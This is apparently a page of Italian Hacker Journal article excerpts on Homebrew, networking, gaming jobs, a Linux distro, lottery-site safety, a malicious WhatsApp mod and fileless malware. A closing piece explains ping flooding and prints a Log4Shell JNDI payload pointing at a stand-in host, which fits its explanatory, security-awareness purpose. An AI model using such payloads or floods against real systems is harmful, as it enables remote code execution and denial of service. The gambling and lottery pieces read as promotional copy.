Connect with us


Articoli

Linux mangia la Mela

Avatar

Pubblicato

il

Mac e Homebrew

Con Homebrew il Mac diventa una bomba anche da riga di comando.

Chi usa un Mac possiede uno strumento molto più potente e flessibile di quello che molti pensano, anche se vuole sperimentare con la riga di comando e con i tool più avanzati per l’hacking. Bisogna solo sapere come fare a prepararlo, perché Apple si guarda bene dal fornire fin da subito gli strumenti necessari. Chi viene dal mondo GNU/Linux può notare la mancanza di questo o quel tool per la riga di comando, o una vecchia versione delle librerie e dei framework del mondo Open Source. Ma soprattutto noterà una cosa che rende macOS un cittadino di serie B del mondo Unix/Linux: manca il gestore di pacchetti!

Un gestore pacchetti facile facile

Per questo motivo è nato Homebrew, che risolve il problema attraverso il linguaggio Ruby che offre flessibilità e facilità di utilizzo. Non è il primo gestore di pacchetti software di questo tipo sviluppato per macOS: ce ne sono stati altri, soprattutto Fink e MacPorts, entrambi con le loro caratteristiche e difficoltà (soprattutto il secondo). Proprio da queste difficoltà di uso dei suoi predecessori, Max Howell ha preso la decisione di realizzare Homebrew, scrivendo il programma di gestione dei pacchetti con il linguaggio Ruby e l’obiettivo di arrivare ad avere la massima estendibilità delle funzioni. Le due caratteristiche principali di Homebrew sono proprio queste: flessibilità e facilità di utilizzo.

Se vuoi sapere come installarlo, configurarlo e metterlo all’opera, non perdere Hacker Journal 221 in tutte le edicole oppure online.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

[wpdevart_facebook_comment curent_url="http://developers.facebook.com/docs/plugins/comments/" order_type="social" title_text="Facebook Comment" title_text_color="#000000" title_text_font_size="22" title_text_font_famely="monospace" title_text_position="left" width="100%" bg_color="#d4d4d4" animation_effect="random" count_of_comments="7" ]

Articoli

A cosa servono i router e gli switch e quali sono le differenze

Avatar

Pubblicato

il

Nella rete di computer, ci sono diversi dispositivi che consentono ai dati di essere trasmessi da un punto all’altro. Due di questi dispositivi sono switch e router. Mentre entrambi i dispositivi sono utilizzati per connettere diversi dispositivi di rete, hanno scopi diversi e sono utilizzati in contesti diversi.

Per acquistare router, switch e altri apparati per migliorare la tua sicurezza ti consigliamo di comprare su ollo shop, un e-commerce specializzata nel mondo dell’elettronica che offre prodotti di ottima qualità a prezzi molto vantaggiosi.

Nelle prossime righe andremo a vedere più nello specifico cosa sono i router e gli switch e quali sono le principali differenze tra loro.

Che cos’è uno Switch

Uno switch è un dispositivo di rete che connette diversi dispositivi sulla stessa rete locale (LAN) e consente la comunicazione tra di loro. Questo dispositivo è progettato per gestire una grande quantità di traffico dati sulla rete LAN, in modo che i dispositivi sulla stessa rete possano comunicare tra loro in modo efficiente e veloce.

Uno switch funziona inviando dati attraverso la rete LAN a destinazioni specifiche, in base all’indirizzo MAC (Media Access Control) del dispositivo di destinazione. L’indirizzo MAC è un identificatore univoco assegnato a ogni dispositivo di rete. Quando i dati vengono inviati attraverso la rete, lo switch cerca l’indirizzo MAC del dispositivo di destinazione e invia i dati solo a quel dispositivo. Ciò significa che solo il dispositivo di destinazione riceverà i dati, riducendo così la congestione di rete e migliorando le prestazioni.

Uno switch è in grado di gestire il traffico di rete LAN, ma non è in grado di instradare il traffico di rete su diverse reti. In altre parole, uno switch è limitato all’ambito di una singola rete LAN.

Che cos’è un Router

Un router è un dispositivo di rete che connette diverse reti e instrada il traffico di rete tra di esse. Un router è progettato per gestire il traffico di rete su diverse reti, comprese le reti LAN e WAN (Wide Area Network). Questo dispositivo è in grado di determinare il percorso più efficiente per instradare i dati sulla rete e di farlo in modo sicuro.

Un router funziona esaminando gli indirizzi IP dei dati in transito e inviandoli al percorso appropriato sulla rete. Gli indirizzi IP sono gli identificatori univoci assegnati a ogni dispositivo di rete sulla rete Internet. Quando un dispositivo sulla rete desidera inviare dati a un altro dispositivo su una rete diversa, i dati vengono inviati al router. Il router esamina l’indirizzo IP di destinazione e invia i dati al percorso appropriato sulla rete. Ciò significa che il router è in grado di gestire il traffico di rete su diverse reti e di instradare i dati in modo sicuro e efficiente.

Quali sono le differenze tra switch e router

Le principali differenze tra switch e router sono legate alle loro funzioni e alla loro capacità di gestire il traffico di rete. Uno switch è progettato per gestire il traffico di rete all’interno di una singola rete locale, ovvero una LAN (Local Area Network), e connettere diversi dispositivi tra di loro. Un router, d’altra parte, è progettato per gestire il traffico di rete tra diverse reti, inclusi i collegamenti tra reti locali e la connessione a Internet.

In termini di come instradano i dati, uno switch utilizza l’indirizzo MAC (Media Access Control) dei dispositivi di rete per inviare i dati alla giusta destinazione. Ciò significa che gli switch inviano i dati solo ai dispositivi che devono riceverli, riducendo la congestione di rete e migliorando le prestazioni complessive. Un router, invece, instrada i dati in base all’indirizzo IP (Internet Protocol) di destinazione. Questo significa che i router sono in grado di determinare il percorso migliore per inviare i dati su diverse reti, che possono includere molteplici punti intermedi tra la sorgente e la destinazione.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Lavorare nel mondo del gaming

Avatar

Pubblicato

il

By

Lavorare nel mondo del gaming

L’intrattenimento domestico e il settore dei giochi, che si tratti di videogame o di live casinò come Betfair, sono da diversi anni in piena crescita, di conseguenza sono sempre più numerose le figure lavorative richieste dalle aziende che operano in questo settore. Ecco quali sono le professioni più in voga nell’industria dei videogiochi e quali sono le più vantaggiose opportunità di guadagno all’interno del gaming.

Sviluppatore

Sviluppatori e programmatori sono due professioni essenziali nella produzione dei videogiochi. Se il programmatore si occupa prevalentemente di porre le fondamenta per la creazione del titolo, lo sviluppatore riveste il ruolo di coordinatore, andando a verificare la correttezza del lavoro del programmatore e a integrare il tutto operando sulla grafica, sui suoni e, in generale, sulla meccanica del gioco.

Sceneggiatore

Determinati titoli, in primis i fantasy, si incentrano su trame ricche di dettagli, paragonabili in tutto e per tutto alle sceneggiature dei film. Proprio per questa ragione è imprescindibile la figura dello sceneggiatore, ovvero colui che si occupa di rendere entusiasmanti e coerenti le caratteristiche dei personaggi, i dialoghi e, in generale, la storia del videogame.

Tester

Il ruolo di tester è uno dei più ambiti dai gamer. Prima di essere commercializzato, ogni titolo viene testato a fondo, sia per individuare la presenza di eventuali errori e bug, sia per accertarsi che trama, regole e sceneggiatura funzionino alla perfezione. Queste verifiche vengono svolte dai tester, ai quali è richiesto, inoltre, di fornire dei suggerimenti per migliorare la qualità del gioco.

Compositore di colonne sonore

L’aspetto sonoro è basilare in ogni videogame. Se per alcuni titoli, come ad esempio quelli sportivi, l’attenzione è concentrata prevalentemente sulla riproduzione degli effetti sonori e sulla telecronaca, per i giochi che presentano una trama è imprescindibile realizzare un’avvincente colonna sonora. Il primo ruolo viene ricoperto dal tecnico del suono, mentre il secondo è svolto solitamente da veri e propri compositori musicali.

Gamer professionista

Riuscire a far diventare quella dei videogiochi una professione è il sogno di molti gamer, alcuni dei quali riescono a trasformarlo in realtà. Grazie agli eSports, infatti, è possibile ottenere importanti guadagni partecipando ai tornei che si svolgono sia online sia in luoghi fisici. Diventare un gamer professionista richiede allenamenti specifici e grande attenzione verso il proprio corpo, esattamente ciò che è richiesto a un atleta.

Content creator

Piattaforme come YouTube e Twitch consentono ai gamer di pubblicare i video delle proprie partite e, di conseguenza, guadagnare dei soldi a seconda alle visualizzazioni ottenute e ad altri aspetti. Quella del content creator è una grande opportunità per chi ama realizzare video e, in questo caso, non è necessario essere preparati come i gamer professionisti.

Croupier

Il mondo degli iGame, ovvero i giochi che si basano sulle scommesse, come ad esempio le puntate al blackjack online o alla roulette, è in forte espansione. Grazie ai casinò virtuali è possibile giocare proprio come all’interno di una reale casa da gioco, per cui sono richieste figure come dealer e croupier, onde permettere ai giocatori di puntare al proprio gioco preferito.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

La distro per i giochi e lo streaming

Una distribuzione basata su Fedora ma rivista in funzione di una maggior facilità d’uso e di un’immediata compatibilità con giochi e multimedia.

Avatar

Pubblicato

il

Fedora è senza dubbio una distribuzione fantastica e popolare, ma non è molto facile da usare per gli utenti non esperti che cercano in Linux la stessa esperienza “punta e clicca” offerta da altri sistemi operativi. I pacchetti di terze parti o proprietari sono inoltre solitamente assenti da una nuova installazione. Secondo i creatori di Nobara, alcune delle cose importanti che mancano in Fedora, specialmente per quanto riguarda i giochi, sono le dipendenze di WINE, obs-studio, i pacchetti di codec di terze parti come quelli per gstreamer, i driver di terze parti come quelli di NVIDIA e anche piccole correzioni ai pacchetti. Nobara si propone di risolvere la maggior parte di questi problemi e di offrire una migliore esperienza per il gioco, lo streaming e la creazione di contenuti. Inoltre, vuole evitare che i nuovi utenti debbano necessariamente aprire il terminale, offrendo loro un’esperienza iniziale più intuitiva attraverso il mouse.

Ci sono tre versioni di Nobara: Official, GNOME e KDE. La prima è rivolta a chi ama le funzionalità di GNOME, ma preferisce il layout di KDE

Un progetto indipendente

Sebbene il progetto utilizzi i pacchetti, il codice e i repository di Fedora, è completamente indipendente da questa distribuzione. Ha il proprio gestore di pacchetti e i propri repository software in aggiunta all’offerta standard di Fedora e tutto è calibrato per soddisfare le esigenze di un nuovo utente orientato al gioco e alla multimedialità. Ci sono tre versioni di Nobara: Official, GNOME e KDE. L’unica differenza tra la ISO ufficiale e quella GNOME è che la prima ha delle estensioni preattivate che le conferiscono un aspetto estetico diverso. A parte offrire un ambiente desktop differente (GNOME con estensioni, GNOME standard e KDE), tutte e tre le versioni hanno pacchetti identici. La ISO ufficiale (testata qui) è rivolta a chi ama le funzionalità di GNOME ma preferisce il layout di KDE. Sono inoltre presenti varie ottimizzazioni ed estensioni per semplificare l’esperienza d’uso e aiutare chi si avvicina al mondo Linux provenendo da quello Windows. L’installazione è semplice e veloce. Dovete solo scaricare l’immagine ISO di installazione da questo link quindi avviarla, selezionare Install quando arrivate al desktop, rispondere ad alcune domande e il processo si completerà autonomamente. Al primo avvio potrebbe essere necessario installare altri codec video e audio. Fatto questo è tutto molto semplice e, che veniate da altri sistemi operativi o siate abituati a lavorare in Linux, non avrete problemi a orientarvi. Gli utenti più esperti possono scegliere la versione GNOME, più facilmente personalizzabile, e sfruttare tutte le migliorie e le scorciatoie per giocare al meglio e gestire senza sforzo ogni genere di contenuto.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Giocare sicuro alle lotterie online

Avatar

Pubblicato

il

By

Lotteria

Giocare online è qualcosa che facciamo ormai da tempo, anche se solo da pochi anni si è aperta la possibilità di ampliare questa possibilità anche alle lotterie o ai casinò, con l’utilizzo di soldi veri.

Era una pratica sicuramente possibile fin da prima, ma solo di recente la cosa è stata finalmente legalizzata e resa sicura dal controllo effettuato dagli enti preposti, tutelando così tutti gli appassionati del genere e facilitando la partecipazione, senza l’obbligo di presentarsi in ricevitoria.

Nel mondo delle lotterie, il più famoso è sicuramente il Lotto online, ma esistono molti tipi di siti simili anche all’estero, accessibili a chiunque. Ma in che modo è possibile assicurarsi della sicurezza di questi portali?

I rischi del gioco su siti non sicuri

Quando si tratta di dati personali non si scherza ed è sempre bene fare attenzione a quali portali andremo a inserirli. Nel mondo delle lotterie i rischi sono maggiori, dal momento che utilizziamo soldi veri per prendere parte al gioco e il pericolo di truffa e furto è dietro l’angolo.

È fondamentale affidarsi perciò a siti di cui già conosciamo la sicurezza o che possiamo verificare, per non rischiare di subire un furto di dati o di soldi.

Per prendere parte a questi giochi online è infatti richiesta una registrazione, dove è necessario inserire anche un documento di riconoscimento per accertare la maggior età del partecipante, e infine di ricaricare un portafoglio virtuale.

Questo significa rilasciare i propri dati e versare una somma di denaro che, non solo rischiano di essere rubati sul momento, ma il sito stesso potrebbe chiudere in qualsiasi momento, in quanto illegale, con conseguente perdita dei soldi investiti.

Quali sono i siti sicuri?

Il primo termine per riuscire ad avere la certezza che un sito sia sicuro o meno è quello di affidarsi ai canali ufficiali di lotterie di fama assicurata, come ad esempio il sito di gioco del Lotto Italia o, nel caso di lotterie all’estero, il gioco con rendita del Regno Unito e l’Euromillions in Francia.

Quest’ultimo infatti ha avuto un grande successo a livello europeo, partendo dalla Francia nel 2004, distribuendosi presto anche in Spagna, Regno Unito, Portogallo e altri Paesi Europei, fino a diventare una delle lotterie più giocate in Europa.

Ma, nonostante ci si possa fidare dei canali ufficiali, è sempre comunque bene prestare attenzione ad alcuni elementi che ci assicurano della fiducia che possiamo dare a queste piattaforme.

Per quanto riguarda i canali italiani, una certezza assoluta su cui possiamo fare affidamento è la certificazione ADM. Si tratta dell’ente preposto al controllo del gioco anche online, l’Agenzia delle Dogane e dei Monopoli.

Sulla homepage del sito in questione deve apparire la certificazione con il rimando al sito dell’agenzia, dove poter verificare la reale presenza di questo tra le piattaforme sotto la loro sorveglianza. Un sito certificato ADM è un sito legale e perciò assolutamente sicuro.

Conclusioni

Giocare alle lotterie online è possibile, grazie ad alcune garanzie che possono assicurarci della sicurezza del sito a cui ci stiamo iscrivendo.

È sicuramente un buon primo approccio quello di affidarsi solo ai canali ufficiali delle relative lotterie, ma nel caso delle piattaforme italiane è sufficiente verificare che ADM abbia rilasciato la propria certificazione che garantisce per quel sito un gioco legale e sicuro.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

L’app malevola che si spaccia per WhatsApp

È una mod che aggiunge imperdibili funzioni ma dopo la sua installazione infetta il dispositivo con il malware Triada

Avatar

Pubblicato

il

La mod si chiama YoWhatsApp e offre la possibilità di inviare numerosi formati di file (fino a 700MB), promette più privacy, nuovi font, un maggiore quantitativo di emoji e un funzionamento più veloce di WhatsApp stesso. Insomma, un bel “bocconcino” per chi usa il programma di messaggistica istantanea ogni giorno, soprattutto per lavoro. Ecco perché è diventata subito popolare, raccogliendo un bacino d’utenza alquanto significativo. Ora, cosa succede quando un prodotto software viene molto usato? Solitamente tende ad attirare le attenzioni di chi vorrebbe utilizzarlo quotidianamente. Purtroppo, e senza volerlo, strizza anche l’occhio ai programmatori di malware e alle organizzazioni criminali che si muovono per sfruttarlo al fine di raggiungere i loro scopi. Ecco spiegato, in poche parole, il perché della nascita di un nuovo dropper contenente il trojan Triada inserito all’interno di YoWhatsApp. Questa mod è stata categorizzata come “estremamente pericolosa”: pare che il trojan in questione sia in grado di iscrivere gli ignari utenti a servizi a pagamento senza il loro consenso…

Uno dei tanti banner pubblicitari che sponsorizzano l’installazione di YoWhatsApp.

 

Mod: Specchietti (appetibili) per allodole

WhatsApp è uno degli applicativi più utilizzati al mondo. Ed è proprio per questo motivo che nascono in continuazione app parallele e non ufficiali che lo riguardano. Si tratta perlopiù di software che aggiungono al programma ufficiale funzioni che non sono state ancora implementate dalla casa madre (Meta), ma che comunque risultano appetibili per la maggior parte degli utenti. Queste, in gergo anglosassone, vengono definite “WhatsApp mod”, ovvero app modificate e realizzate al fine di poter offrire ciò che WhatsApp ancora non offre. Sono app che vengono sviluppate da aziende o da programmatori indipendenti che, partendo dal codice originale, realizzano applicazioni simili, modificate con le funzioni aggiuntive compatibili con la piattaforma ufficiale. In altri termini, se si installa una di queste mod e si inizia a conversare con uno dei contatti che usa la versione originale, la chat funzionerà perfettamente! C’è da precisare, tuttavia, che a Meta non piace affatto che vengano utilizzate queste app, ed esse non sono ammesse né su Google Play Store né su Apple App Store, perciò si scaricano solo passando da store alternativi. Ma a cosa è dovuta questa reticenza nel permettere l’utilizzo delle WhatsApp mod? In primo luogo, alle funzionalità non ufficiali offerte che sono spesso immorali e, talvolta, illegali. Poi c’è anche da prendere in considerazione il fatto che ogni volta che si scarica da fonti alternative, si rischia di installare applicativi contenenti software malevolo, dannoso per lo smartphone. Inoltre, la maggior parte delle volte non si sa neanche chi le sviluppa e chi gestisce i nostri dati quando le usiamo.

Nel momento in cui scriviamo, sul sito ufficiale (www.yowhatsapp.net) è disponibile per il download la versione 9.52 dell’APK per device Android.

 

Come difendersi

A individuare il pericolo della mod YoWhatsApp sono stati gli esperti di Kaspersky e, sempre loro, hanno riportato in un report pubblicato sul loro sito dei consigli utili per evitare di cadere nella trappola. Il più banale è quello di non installare la mod in questione e di orientarsi solo su applicazioni presenti negli store ufficiali, senza prelevare file APK da altri siti. Stando all’articolo, infatti, l’applicazione viene sponsorizzata su altri portali e app Android. Bisogna poi ricordare che, nel caso si fosse già installata, questa va subito rimossa, per evitare che vengano sottratte le chiavi di WhatsApp, cosa che la versione 2.22.11.75 dovrebbe essere in grado di compiere. Sempre in base a ciò che dice Kaspersky, l’app modificata è capace di inviare le chiavi d’accesso al server remoto dello sviluppatore. Infine, occhio anche alla mod WhatsApp Plus, che potrebbe contenere la stessa tipologia di codice malevole.

L’installazione di YoWhatsApp deve avvenire scaricando e lanciando l’APK: l’app non è infatti presente sugli store ufficiali di Google e Apple.

 

 

 

 


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Non-malware attack: perché fanno paura!

Non lasciano traccia sul disco e attaccano i sistemi sfruttando applicazioni apparentemente super sicure. Scopriamo come funzionano, i tool usati dagli hacker per crearli e come difendersi

Avatar

Pubblicato

il

Se pensiamo a un attacco informatico, diamo quasi sempre per scontato che alla base vi sia l’infezione di un file, sia esso l’eseguibile di un’applicazione, una libreria di sistema, un documento specifico (XLSX, PDF, ecc.), un elemento quindi con una chiara e ben definita impronta digitale permanente. In realtà esistono malware in grado di infettare un sistema senza necessariamente sfruttare file intermediari, sono in gergo conosciuti come fileless malware e sono ben noti agli esperti di sicurezza informatica da oltre un ventennio. Non lasciando specifiche tracce da rilevare all’interno di un file, questo tipo di malware risulta particolarmente subdolo perché difficilmente scovabile dagli antivirus. In questo articolo, oltre ad esaminare alcune delle metodologie di rilevamento più all’avanguardia, vedremo anche quali sono i fileless malware più noti e come agiscono per portare a termine gli attacchi per cui sono stati programmati.

 

Come funzionano?

Un malware che non sfrutta i file si affida a ogni altra componente della macchina vulnerabile, o resa tale, per annidarsi e sferrare l’attacco: memoria, firmware (di dispositivi di storage, schede di rete…), BIOS, protocolli e finanche la CPU; una volta annidati, tali malware compiono quelle che tecnicamente sono chiamate operazioni di memory code injection, ovvero l’injection di codice malevolo nella memoria di una specifica applicazione o processo in esecuzione, senza quindi sfruttare nessun file e in modo del tutto trasparente all’utente. L’attacco iniziale avviene proponendo all’utente il download di software malevolo, inviando e-mail di phishing o link a pagine web infette. I malware sono tutti progettati per scaricare in memoria del PC codice infetto (payload) in grado di caricare da remoto script malevoli che generalmente dialogano con applicazioni sicure già installate nel proprio PC e che quindi vengono eseguiti a insaputa dell’utente durante la normale esecuzione di script legittimi (infiltrazione laterale). Tra le applicazioni più utilizzate dagli hacker si segnalano Microsoft PowerShell e Windows Management Instrumentation.

 

La macro Word che il malware PowerSniff attiva per scaricare uno script malevolo da iniettare in Microsoft Powershell.

I fileless malware che conosciamo

Il 13 luglio del 2001 venne individuato il primo malware di tipo fileless, attaccava i computer con installato Internet Information Services di Microsoft mostrando sulla homepage dei siti gestiti da IIS la scritta “Welcome to http://www.worm.com ! Hacked by Chinese!”. L’infezione, avvenuta sfruttando un buffer overflow di IIS, si propagò fino a raggiungere ben 359mila server. Il malware venne scoperto da Marc Maiffret e Ryan Permeh, dipendenti in forza alla eEye Digital Security. Fu battezzato Code Red per via della bibita, la Mountain Dew Code Red, che i due stavano sorseggiando durante la scoperta. Negli anni successivi la stessa tecnica di attacco è stata impiegata per colpire altri sistemi, nel 2003 il worm SQL Slammer prese di mira Microsoft SQL Server per lanciare attacchi di tipo denial-of-service, nel 2013 il trojan Lurk seminò il panico tra le banche sottraendo diverso denaro. Anche il registro di configurazione di sistema di Windows viene spesso impiegato come tramite per sferrare attacchi di tipo fileless e passare inosservato ai controlli, è il caso del trojan Poweliks, scovato nel 2014. Il malware, divulgato come allegato di posta elettronica di tipo Microsoft Word, salva uno script malevolo codificato nel Registro di Windows (impiegando Microsoft Powershell). Il payload progettato dagli hacker consente di scaricare ed eseguire da remoto altro codice malevolo.
A metà del 2015, nel corso di una conferenza stampa tenutasi a Londra, Kaspersky Labs rivelò di essere stata attaccata da un malware denominato Duqu 2.0. Gli hacker avrebbero agito indisturbati per mesi sulle reti di Kaspersky; l’ipotesi è che stessero facendo un’operazione di ricognizione e ricerca, nella speranza di saperne di più sulle tecnologie di sicurezza messe inm atto dall’azienda. Anche Duqu 2.0 svolge i suoi attacchi malevoli quasi esclusivamente nella memoria della macchina attaccata. Nel 2016, Josh Grunzweig e Brandon Levene della Palo Alto Networks – multinazionale americana di sicurezza informatica con sede a Santa Clara, in California – documentarono l’escalation del malware PowerSniff; distribuito alle vittime tramite e-mail con allegato un documento Microsoft Word, l’attivazione della macro in esso contenuta scarica nel sistema uno script PowerShell in grado di decodificare ed eseguire ulteriori payload dannosi, tutto questo operando esclusivamente in memoria e salvando temporaneamente una DLL dannosa nel file system. Quasi contemporaneamente, Mike Sconzo e Rico Valdez ricercatori della Carbon Black individuarono il ransomware PowerWare operante, grosso modo, alla stessa maniera di PowerSniff. Negli ultimi anni i malware di tipo fileless si sono evoluti sfruttando nuove tecniche e diventando uno degli attacchi informatici più utilizzati dai cybercriminali.

 

I tool usati dai cybercriminali e come proteggersi

Così come esistono in circolazione applicazioni che consentono agli hacker di sviluppare agevolmente software malevoli, per i malintenzionati sono disponibili anche tool che permettono di sviluppare malware di tipo fileless. Tra i toolkit più impiegati dai cybercriminali: PowerSploit, PowerShell Empire e Cobalt Strike, nato come software di cyber security e diventato uno dei tool preferiti dai cyber criminali per sferrare attacchi malevoli. La protezione da malware di tipo fileless non può passare dai soli software antivirus, che cercano “impronte” del virus nei file, sono necessarie applicazioni in grado di agire a più ampio raggio, per tale motivo nel tempo sono state introdotte specifiche tecniche, ad esempio basate sulla firma dei file eseguibili del sistema operativo. A tale metodologia – soprattutto in ambito aziendale – si affiancano sistemi di endpoint protection e di monitoraggio in tempo reale del traffico di rete.

Nell’aprile 2020, la European Union Agency for Cybersecurity (ENISA) pubblicò un rapporto in cui mostrò che gli attacchi malware di tipo fileless hanno una probabilità dieci volte maggiore di riuscire rispetto a un attacco convenzionale.

 

 

 

 

Continua a Leggere

Articoli

Risorse e statistiche dell’hacking moderno

Scoprire il più grande DDoS della storia e affinare le vostre competenze da hacker potrebbe aiutarvi a prevenire il prossimo

Avatar

Pubblicato

il

Nel mondo degli hacker ci sono stati grandi cambiamenti e la cultura di imparare a intervenire nei computer in modo innovativo per il piacere di farlo si è un po’ persa. Per esempio, se cercate su Google risorse su come hackerare non troverete probabilmente informazioni utili, ma ogni sorta di spam e link di phishing che non vi consigliamo di toccare, neanche con JavaScript disattivato. Tuttavia ci sono molte risorse valide per imparare a fare ricognizioni di rete, test di penetrazione e persino per utilizzare le tecniche di phishing. Siti come https://tryhackme.com, per esempio, vi insegneranno queste abilità con l’obiettivo di insegnarvi a difendervi da esse. TryHackMe rende divertente il processo di apprendimento attraverso la gamification delle esercitazioni, in alcuni casi regalandovi delle macchine virtuali da scaricare e penetrare. Ci sono lezioni, laboratori e concorsi che vi aiuteranno a imparare di tutto, da Metasploit a Maltego. Una parte importante della cultura hacker è rappresentata dalle sfide Capture The Flag (CTF). Chiamato in italiano rubabandiera, il CTF è un gioco tradizionale in cui le squadre competono per cercare di catturare le bandiere dalle basi avversarie e riportarle alla propria. Nella versione hacker, invece, si tratta semplicemente di trovare le “bandiere” (a volte solo file vuoti chiamati flag, altre volte oggetti più interessanti) nascoste da chi ha lanciato la sfida.

Armitage è una GUI per Metasploit. Per utilizzarla, avviate Metasploit Framework dal menu System Service

 

Un’inondazione di ping

Abbiamo iniziato con il Ping of Death, quindi concludiamo con l’attacco Ping Flood. Invece di un singolo pacchetto malevolo, viene trasmesso un numero enorme di pacchetti di dimensioni legittime. L’idea è quella di sopraffare il computer target inviando più ping di quanti ne possa gestire. Sia il Ping of Death sia il Ping Flood fanno parte dell’ampia categoria degli attacchi Denial of Service (DoS). Su Linux alcune funzioni del comando ping sono disponibili solo per l’utente root. Un esempio è l’opzione -f o flood, che se usata da sola invia le richieste di eco il più velocemente possibile. Se l’aggressore dispone di una larghezza di banda significativamente maggiore e il difensore non ha un firewall che previene gli attacchi DoS, è possibile che un computer ne paralizzi un altro in questo modo. È più comune, tuttavia, che un hacker utilizzi diversi host per inviare i ping, sferrando un attacco DDoS (Distributed Denial of Service o Denial of Service distribuito). L’attacco è in genere effettuato da una botnet sotto il controllo dell’hacker. I gruppi di criminalità informatica possono affittare sezioni di un gruppo di macchine zombie che hanno creato o usarlo direttamente e la banda a disposizione è enorme. Nel 2016 il provider DNS Dyn è stato mandato offline (rendendo inaccessibili molti siti Web popolari) a causa del malware Mirai, che infetta principalmente i dispositivi IoT utilizzando credenziali predefinite. La larghezza di banda totale di questo attacco è stata stimata intorno a 1,2 Tbps. Nel novembre 2021, Microsoft ha rivelato di aver sventato il più grande attacco DDoS della storia, a ben 3,47 Tbps. Si tratta di una quantità di dati 3.000 volte superiore a quella di una LAN gigabit. La vulnerabilità di Log4shell sfruttava l’input non sanificato e poteva arrivare a consentire l’esecuzione di codice remoto. Tutto ciò che un utente malintenzionato doveva ottenere era far sì che un messaggio accuratamente creato, come:

${jndi:ldap://example.com/bad_file}

fosse scritto in un file di log. Come Bash, Log4j esegue la sostituzione delle stringhe sulle espressioni tra parentesi graffe. Nelle giuste circostanze, il contenuto di /bad_file potrebbe essere eseguito immediatamente sul server. Oppure il log può essere elaborato su un altro server e /bad_file può essere eseguito lì in un secondo momento. Se l’esecuzione del codice viene evitata, un aggressore può comunque far sì che la macchina vulnerabile invii dati (come variabili d’ambiente o contenuti di moduli) alla sua.

 

Un falso senso di sicurezza

In questo caso si abusa della capacità di Java Naming and Directory Interface (JNDI) di recuperare risorse tramite LDAP, ma è possibile utilizzare altri protocolli. Di conseguenza, poco dopo la prima falla ne sono state scoperte altre, e sono state inizialmente diffuse numerose mitigazioni incomplete, che hanno creato un falso senso di sicurezza. Una volta compromesse, le macchine venivano inserite in botnet, paralizzate da ransomware oppure sfruttate per il mining di criptovalute. È interessante che l’attacco Dyn sia stato attribuito (anche se non in modo definitivo) a giocatori scontenti di Minecraft, come anche Log4j. Infatti, per sfruttare Log4j su un server Minecraft vulnerabile, tutto ciò che si doveva fare era postare nella chat lo snippet di codice che abbiamo riportato. Da lì veniva processato da Log4j e, se si verificavano varie condizioni, l’attaccante poteva eseguire del codice. Con questo si conclude il nostro speciale sugli hacker. Naturalmente abbiamo appena scalfito la superficie dell’argomento e abbiamo visto solo una parte della fantastica selezione di strumenti di Parrot, ma speriamo che abbiate imparato qualcosa. Noi sicuramente sì! Come ultimo esperimento abbiamo preso in considerazione un vecchissimo nostro sito in Drupal. Poiché siamo appassionati di storia digitale, abbiamo archiviato la maggior parte di esso in una macchina virtuale e, dato che oggi parliamo di toolkit per hacker, abbiamo pensato di provare a violarla. Nmap ha rivelato che stava eseguendo il seguente antico software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1 e Subversion (nessun numero di versione rilevato). Per quanto ci abbiamo provato, però, nessuno dei nostri exploit ha funzionato. Abbiamo usato ZAP (Zed Attack Proxy) di OWASP (Open Web Application Security Project, https://owasp.org) per cercare di attaccare i vecchi moduli di archivio, ma senza successo. ZAP funziona impostando un proxy person in the middle in grado di manipolare le richieste perché vengano inviate al server Web in esame e di ispezionare le risposte. Abbiamo anche provato Metasploit, che meriterebbe un intero articolo a sé stante. Tuttavia il fantasma della nostra macchina, a quanto pare, è inviolabile. A  dimostrazione che, nel mondo degli hacker, bisogna sempre aspettarsi l’impossibile.

Wireshark è in grado di sniffare quasi tutti i pacchetti sulla vostra LAN


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

In Edicola & Digitale

269 – Dal 27 gennaio 2022!

Forum

Trending